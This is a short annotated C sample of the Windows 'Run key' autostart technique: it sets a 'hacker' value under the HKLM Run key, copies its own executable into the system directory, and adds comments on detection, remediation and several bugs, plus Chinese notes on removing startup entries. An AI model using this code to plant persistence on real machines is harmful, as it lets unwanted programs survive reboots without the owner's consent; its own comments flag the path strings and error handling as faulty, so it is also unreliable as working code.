- #include <stdio.h>
- #include <windows.h>
/*
 * main: sample of the "Run key" autostart technique (MITRE ATT&CK
 * T1547.001), annotated here for defenders. In order, it:
 *   1. opens the machine-wide Run key under HKEY_LOCAL_MACHINE,
 *   2. sets a REG_EXPAND_SZ value named "hacker" whose data points at
 *      hacker.exe under %systemroot%,
 *   3. copies its own executable image to the string built from
 *      GetSystemDirectory() plus the literal "//hacker.exe".
 * Always returns 0; the outcome is reported only through printf.
 *
 * Detection notes: the two artefacts are a value-set on the HKLM Run key
 * (registry auditing, e.g. Sysmon event ID 13) and a new executable
 * created in the system directory (e.g. Sysmon event ID 11). Under default
 * ACLs both writes need administrative rights, so a non-elevated process
 * attempting them is itself worth alerting on.
 * Remediation: delete the "hacker" value from the Run key and remove the
 * copied file.
 */
- int main(void)
- {
- char regname[]="Software//Microsoft//Windows//CurrentVersion//Run";
- HKEY hkResult;
/* NOTE(review): ret from RegOpenKey is overwritten on the next line, so the
 * check below reflects the result of RegSetValueEx only. */
- int ret=RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult);// open the registry key
/* Value name "hacker", type REG_EXPAND_SZ; 25 is passed as the data size. */
- ret=RegSetValueEx(hkResult,"hacker",0,REG_EXPAND_SZ,(unsigned char *)"%systemroot%//hacker.exe",25);// set the value
- if(ret==0){
- printf("success to write run key/n");
- RegCloseKey(hkResult);
- }
/* Reached when RegSetValueEx returned non-zero; the message says "open" but
 * ret holds the set-value result. This path returns without RegCloseKey. */
- else {
- printf("failed to open regedit.%d/n",ret);
- return 0;
- }
- char modlepath[256];
- char syspath[256];
- GetModuleFileName(0,modlepath,256);// get this program's own file name
- GetSystemDirectory(syspath,256);
/* strcat appends in place, so syspath afterwards holds the full destination
 * path. The last argument (1) makes CopyFile fail if that file exists. */
- ret=CopyFile(modlepath,strcat(syspath,"//hacker.exe"),1);
- if(ret)
- printf("%s has been copyed to sys dir %s/n",modlepath,syspath);
/* CopyFile returned 0: reported as "exists", although any copy failure
 * lands in this branch. */
- else
- printf("%s is exisis",modlepath);
- return 0;
- }
- 开机启动项删除:在下面的注册表项中找到并删除不需要的键值(上例写入的键值名为 hacker):
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
- "msconfig"里面多余的启动项(被禁用的启动项)
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]